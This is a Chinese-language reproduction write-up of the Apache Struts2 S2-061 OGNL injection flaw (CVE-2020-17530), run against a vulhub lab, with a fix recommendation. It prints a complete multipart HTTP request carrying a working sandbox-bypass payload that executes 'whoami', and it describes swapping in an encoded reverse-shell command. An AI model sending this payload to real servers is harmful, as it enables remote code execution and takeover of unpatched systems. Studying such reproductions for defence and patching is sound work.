Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

2022年7月11日09:54:01评论97 views字数 2071阅读6分54秒阅读模式

概述

Apache Struts2 框架是一个用于开发 Java EE 网络应用程序的 Web 框架。Apache Struts 于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些 tag 等情况下可能存在 OGNL 表达式注入漏洞，从而造成远程代码执行，风险极大。

受影响版本

struts 2.0.0 - struts 2.5.25

漏洞原理

由于 Struts2 会对某些标签属性(比如 `id`) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时，用户即可构造一些 SSRF、远程命令执行等形式的 payload，并将这些恶意 payload 以`%{...}`形式传入该标签属性，即可造成 OGNL 表达式执行。S2-061 是对 S2-059 沙盒进行的绕过。

环境搭建

Linux操作系统（安装了 vulhub 漏洞环境）

进入到对应的环境中拉取镜像：CVE-2020-17530

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

漏洞复现

首先使用 id=%{9*9} 来查看返回的 id 是81还是9*9，如果是81就说明进行了二次表达式解析，说明存在该漏洞；如果还是9*9的话，就说明没有进行二次表达式解析，不存在该漏洞。

这里发现id的结果是81，说明进行了二次表达式解析，则表明存在该漏洞。

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

然后使用bp抓包

修改为下面的代码

POST /.action HTTP/1.1Host: 192.168.1.136:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=node0ogtkm7uvdt1kgl7lufd5d04y1.node0Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data;  boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 833
------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

对要生成的反弹 shell 命令进行 bash 编码

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

将编码后的 payload 加入到 #arglist.add 参数中

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

发送数据，反弹成功

Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

修复建议

推荐的解决方案：升级至Struts 2.5.26版本或者更高版本

- End -

原文始发于微信公众号（NS Demon团队）：Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Spring Security CVE-2025-22234 引入用户名枚举向量

CVE-2025-33028：WinZip 漏洞通过 MotW 绕过导致用户遭受静默代码执行

四川某大学教材订购系统存在任意用户密码找回

CVE-2025-0282复现

【漏洞情报】SAP NetWeaver存在RCE漏洞

【高危漏洞预警】Craft CMS generate-transform反序列化代码执行漏洞（CVE-2025-32432）

Grafana权限管理不当漏洞

【二次更新已复现】SAP NetWeaver MetadataUploader 文件上传漏洞（CVE-2025-31324）

CVE-2025-26244 DeimosC2 XSS

【PoC】0-Click NTLM 身份验证绕过 Microsoft Telnet 服务器 0day，无补丁

本文由 admin 发表于 2022年7月11日09:54:01
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Struts2-061 远程代码执行(CVE-2020-17530)漏洞复现https://cn-sec.com/archives/1170580.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

8888